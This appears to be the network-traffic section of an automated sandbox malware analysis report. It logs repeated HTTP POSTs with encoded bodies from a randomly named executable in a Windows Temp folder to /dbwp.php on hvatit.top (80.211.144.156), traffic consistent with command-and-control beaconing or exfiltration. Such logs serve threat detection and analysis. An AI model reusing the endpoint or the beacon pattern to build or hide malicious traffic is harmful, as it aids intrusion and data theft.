                                                        Data Ascii: WVVRPVU\RRV\L~hNi]vriMaP|lSOwRZMh]xylwJlYyZ|SoUct]je~V@Azmnb[
                                                        Aug 31, 2024 09:32:13.239546061 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:13.331662893 CEST1236INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:12 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 1328
                                                        Connection: keep-alive
                                                        Data Raw: 56 4a 7e 05 7b 7d 56 5e 78 5c 73 5b 68 62 7b 02 6a 5e 63 0d 68 4e 6a 54 6e 5a 6c 04 69 4c 67 5a 77 5d 53 4f 6e 61 65 00 62 58 70 48 7c 71 78 01 55 4b 72 50 63 61 78 58 6b 62 57 4c 68 67 54 0a 6f 48 6b 52 69 5a 7f 48 75 5c 69 02 63 58 69 48 6b 72 6a 02 7e 6f 60 08 7e 77 5e 5e 76 5c 7b 06 7c 5c 6a 5a 7d 63 6a 58 79 77 70 00 6f 49 6c 05 6f 0b 7b 49 79 5b 63 5a 7b 5a 6e 04 7d 73 7f 5b 79 77 6c 07 69 5c 5d 04 76 5f 73 5c 7a 51 41 5b 7c 77 67 51 7d 61 58 51 61 0a 6b 5f 7a 6c 64 04 76 60 72 08 6e 71 7a 5a 69 7c 71 5a 7a 61 7e 00 76 4d 60 58 61 62 67 5a 63 72 7e 50 7e 5d 79 5f 77 04 7d 04 76 66 77 50 7f 6c 66 58 77 7c 73 5d 7f 5d 6c 07 6f 6f 73 03 7b 06 76 4b 6b 6d 78 08 77 77 6c 05 7e 61 71 50 7e 6e 7f 42 6f 7d 61 5f 6a 5c 53 04 7b 5d 46 51 68 7f 6b 53 7d 70 73 54 6a 5e 66 4c 7b 6d 67 49 78 71 74 03 6b 5f 67 01 7c 77 5a 53 7c 70 75 40 7b 70 68 07 7d 4c 73 5b 60 60 61 51 7b 5c 79 01 77 66 7c 48 7d 76 7c 4f 7d 66 5f 0d 77 5c 6b 01 7f 4c 69 4d 7c 59 76 09 7b 58 78 40 7d 4d 7f 4a 76 5c 53 07 77 71 5f 00 7f 71 [TRUNCATED]
                                                        Data Ascii: VJ~{}V^x\s[hb{j^chNjTnZliLgZw]SOnaebXpH|qxUKrPcaxXkbWLhgToHkRiZHu\icXiHkrj~o`~w^^v\{|\jZ}cjXywpoIlo{Iy[cZ{Zn}s[ywli\]v_s\zQA[|wgQ}aXQak_zldv`rnqzZi|qZza~vM`XabgZcr~P~]y_w}vfwPlfXw|s]]loos{vKkmxwwl~aqP~nBo}a_j\S{]FQhkS}psTj^fL{mgIxqtk_g|wZS|pu@{ph}Ls[``aQ{\ywf|H}v|O}f_w\kLiM|Yv{Xx@}MJv\Swq_qvHlx~IJuOYG{b[}NaJxItC{YhxmsHyL`xcrN}ptxYdJ}\]wad~|UHwp|qyuR|N{BZvpvyqmG}lPLzqPuM]v_lva\@|NTvbauu^@leBv|hL|]^K{BQxpf}mlAtY|b\}mQxS\}\q@|pdR^~`t@~wrx}sx\||qJ}YcA|^a@zspL~\VFtsW@yq[vHdK}vZ~HqOt\k|LWL}wP{Xt|sYvb_tOaH|OX~ltA~YwIva{{r}~p[xghN{Ihx}Qzr^xcP{]NZ{gpI}r|_vOwZ~R^Z}tdXnPaBs_oR`H`^\NyaIi|j_z\yvxBagx[L~Jx^zwLyLvpklf_v|w^h]Z{odZ{ci_hmhtIZ}azBzSYQcT}inj_QAS`{jgNP{}BQ~dYRqcBkf{@zYgpaO{sQ_j\g\w}@n_iuuhHivpiH~TtrYkaO{YC_]TQpC\a\F[YIkmuj`{yY]Zwv{_H~^uF{It]zps[lnFU~c_T`PkUS`|z][\LwjQ|@{vHV}_Pt{sXooF[|aWUbVPUeXTbDq]YZlXcps[ORY@^uur[bfOSpf[XoSRZo]WoGdXhjppZpEy[STQtKQnSFRZN [TRUNCATED]
                                                        Aug 31, 2024 09:32:13.331677914 CEST249INData Raw: 40 7b 5b 54 59 50 00 71 4a 52 65 5d 48 51 5b 0b 5a 5a 05 6e 43 5d 7d 72 05 65 58 75 45 6a 6b 7c 0f 79 5f 64 46 59 6d 60 5c 6f 75 7a 64 57 73 7e 03 6c 6b 74 53 54 01 60 52 67 6e 03 5d 54 5b 59 5b 6c 64 7e 45 7b 59 5d 5f 54 00 77 40 57 61 52 47 5a
                                                        Data Ascii: @{[TYPqJRe]HQ[ZZnC]}reXuEjk|y_dFYm`\ouzdWs~lktST`Rgn]T[Y[ld~E{Y]_Tw@WaRGZYZQSdTP[f}ZkZ|R^Xp]@PnbFPKo_D`xEZ[gF[XaLUq_[am\wXpQ}{z[coBSo]WoTWsuSakctl__~Qz|VonAR~fYSc^PLj]WdeX|S]Z_FXkdEPtNk\MlkERac[T}__Zq\
                                                        Aug 31, 2024 09:32:13.369049072 CEST217OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 380
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:32:13.573038101 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:13.573350906 CEST380OUTData Raw: 5f 5f 5c 54 5a 5e 55 55 5d 5f 54 57 54 58 5b 56 5a 5c 59 5c 52 55 54 59 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: __\TZ^UU]_TWTX[VZ\Y\RUTYQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.3&C?985<Z.,3[43* W'3=(8,<<8;?!]'/Z,-
                                                        Aug 31, 2024 09:32:13.867084026 CEST308INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:13 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive
                                                        Data Raw: 0c 15 20 0d 33 38 21 0d 20 15 2e 1e 3e 02 39 50 30 1e 2b 58 2f 1f 36 58 29 29 24 00 2a 03 30 50 27 13 2b 03 25 28 36 12 25 06 27 0c 30 0e 21 5b 07 10 22 1f 26 58 27 5a 2d 3c 3e 13 32 09 22 00 34 0f 2e 5b 3e 5b 25 5a 35 2b 22 06 27 16 3e 55 2f 17 0c 56 2b 2e 2f 59 3e 3b 24 58 31 38 2b 50 00 12 26 50 24 2f 3c 57 22 2e 3a 5a 35 38 20 0b 33 35 0d 13 20 02 2c 58 3f 5e 29 55 30 2f 3d 0d 23 20 0b 12 31 32 0f 06 2b 00 34 0b 29 16 26 5d 2e 01 23 56 02 36 59 56
                                                        Data Ascii: 38! .>9P0+X/6X))$*0P'+%(6%'0!["&X'Z-<>2"4.[>[%Z5+"'>U/V+./Y>;$X18+P&P$/<W".:Z58 35 ,X?^)U0/=# 12+4)&].#V6YV
                                                        Aug 31, 2024 09:32:13.889965057 CEST218OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:32:14.094197989 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:14.094379902 CEST1436OUTData Raw: 5f 5f 59 52 5f 5e 55 52 5d 5f 54 57 54 5f 5b 54 5a 54 59 59 52 55 54 53 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: __YR_^UR]_TWT_[TZTYYRUTSQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.['!6=9/5=$,?$ 87$\ 0&8&>2(;]+4./!]'/Z,
                                                        Aug 31, 2024 09:32:14.388472080 CEST308INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:13 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive
                                                        Data Raw: 0c 15 23 10 24 38 0b 0e 20 15 32 1f 3e 5a 39 13 24 23 23 12 2f 1f 00 5e 3e 07 37 5f 29 2a 23 0d 33 3d 28 5f 24 01 3a 57 32 59 28 56 25 34 21 5b 07 10 22 11 26 10 2f 5c 2c 02 35 00 25 09 31 58 21 31 0c 16 3d 2e 2d 5a 36 15 0f 14 27 28 00 17 3b 00 21 08 28 2d 34 01 2a 06 2c 5f 32 02 2b 50 00 12 26 1a 26 01 19 0a 20 2d 3a 5a 21 06 3c 0c 27 1b 2f 5b 20 3b 37 05 3f 5e 29 1e 24 5a 2e 1c 23 56 21 13 32 0b 25 05 28 3e 05 53 29 06 26 5d 2e 01 23 56 02 36 59 56
                                                        Data Ascii: #$8 2>Z9$##/^>7_)*#3=(_$:W2Y(V%4!["&/\,5%1X!1=.-Z6'(;!(-4*,_2+P&& -:Z!<'/[ ;7?^)$Z.#V!2%(>S)&].#V6YV


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.44973580.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:13.504538059 CEST218OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:32:13.849100113 CEST2560OUTData Raw: 5a 59 59 52 5a 5d 50 51 5d 5f 54 57 54 5d 5b 54 5a 52 59 5b 52 52 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZYYRZ]PQ]_TWT][TZRY[RRT]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-'+9$T5:#_4$S0?'%4'2T(X??,!]'/Z,1
                                                        Aug 31, 2024 09:32:14.189268112 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:14.327739954 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:13 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.44973780.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:14.465145111 CEST218OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:32:14.817850113 CEST2560OUTData Raw: 5a 5e 5c 56 5f 59 50 54 5d 5f 54 57 54 5c 5b 54 5a 52 59 52 52 5c 54 5b 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z^\V_YPT]_TWT\[TZRYRR\T[Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.0*((S#.+.07#$4T$'0%?; +,//!]'/Z,5
                                                        Aug 31, 2024 09:32:15.130662918 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:15.259851933 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.44973980.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:15.385185003 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:15.739810944 CEST2560OUTData Raw: 5f 5e 59 53 5a 5d 50 56 5d 5f 54 57 54 5b 5b 51 5a 5c 59 53 52 5d 54 59 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _^YSZ]PV]_TWT[[QZ\YSR]TYQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.X$"9?9" .,# S39<T353-(,?Z'/!]'/Z,)
                                                        Aug 31, 2024 09:32:16.069808006 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:16.204001904 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.44974080.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:16.340157986 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:16.692857981 CEST2560OUTData Raw: 5a 5a 59 54 5a 5f 55 52 5d 5f 54 57 54 51 5b 55 5a 5d 59 53 52 50 54 5f 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZZYTZ_UR]_TWTQ[UZ]YSRPT_Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.31!=9V">89,^#84$*<Q$5+Z$=!(+'+Z#T./!]'/Z,
                                                        Aug 31, 2024 09:32:17.021792889 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:17.212992907 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.44974180.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:17.341413021 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:17.693007946 CEST2560OUTData Raw: 5f 5f 59 53 5f 5f 50 52 5d 5f 54 57 54 5b 5b 54 5a 57 59 59 52 53 54 5b 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: __YS__PR]_TWT[[TZWYYRST[Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.'!1<9/6>8_-,Z#]8&*'&5;^$)*(8+4/!]'/Z,)
                                                        Aug 31, 2024 09:32:18.026305914 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:18.159992933 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.44974280.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:18.292800903 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:18.645994902 CEST2560OUTData Raw: 5f 5d 59 54 5a 55 55 57 5d 5f 54 57 54 59 5b 56 5a 5d 59 5e 52 5d 54 59 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _]YTZUUW]_TWTY[VZ]Y^R]TYQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.3!:+ V5[90 #$\7&%#'(?+<<,/!]'/Z,!
                                                        Aug 31, 2024 09:32:18.978549957 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:19.109905005 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.44974380.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:19.247610092 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.44974480.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:19.403630018 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1420
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:19.755436897 CEST1420OUTData Raw: 5a 5d 59 50 5f 5e 55 56 5d 5f 54 57 54 58 5b 51 5a 53 59 53 52 52 54 5b 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z]YP_^UV]_TWTX[QZSYSRRT[Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.'W&B<45=<Z-,/^74U$\($C $*U?0(,#W8!]'/Z,1
                                                        Aug 31, 2024 09:32:20.070568085 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:20.275399923 CEST308INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive
                                                        Data Raw: 0c 15 23 55 30 16 2d 08 37 3b 32 54 3d 02 3e 09 24 23 2c 03 2f 57 36 5a 3e 07 37 58 2a 29 24 1c 27 2e 2c 5b 33 38 0b 09 26 2f 24 55 24 24 21 5b 07 10 21 02 25 10 24 02 2f 2c 2a 10 32 20 22 02 20 57 26 5e 3d 2d 0c 05 21 5d 22 03 24 38 31 08 38 00 22 54 3c 58 37 5a 29 3b 33 07 32 38 2b 50 00 12 26 52 32 3f 37 0e 35 00 2d 06 21 28 23 57 27 0b 2f 58 37 02 2f 03 3c 38 21 57 30 3c 26 50 20 20 04 06 26 0b 3e 5a 28 10 3f 1a 3d 06 26 5d 2e 01 23 56 02 36 59 56
                                                        Data Ascii: #U0-7;2T=>$#,/W6Z>7X*)$'.,[38&/$U$$![!%$/,*2 " W&^=-!]"$818"T<X7Z);328+P&R2?75-!(#W'/X7/<8!W0<&P &>Z(?=&].#V6YV


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.44974580.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:19.537461042 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:19.895970106 CEST2560OUTData Raw: 5a 55 5c 56 5f 58 50 56 5d 5f 54 57 54 5f 5b 5c 5a 5d 59 5e 52 56 54 5a 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZU\V_XPV]_TWT_[\Z]Y^RVTZQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.]'-<)8U5 [-8#;4W34Q$&-:(8(+T;!]'/Z,
                                                        Aug 31, 2024 09:32:20.225775957 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:20.422074080 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.44974680.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:20.555720091 CEST218OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:32:20.911768913 CEST2560OUTData Raw: 5a 5d 59 57 5a 5d 55 55 5d 5f 54 57 54 5a 5b 54 5a 53 59 5a 52 50 54 5b 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z]YWZ]UU]_TWTZ[TZSYZRPT[Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.Z0)<9(" ]9+X ; 3970&80=!?(/(/7W,!]'/Z,-
                                                        Aug 31, 2024 09:32:21.220643044 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:21.348033905 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
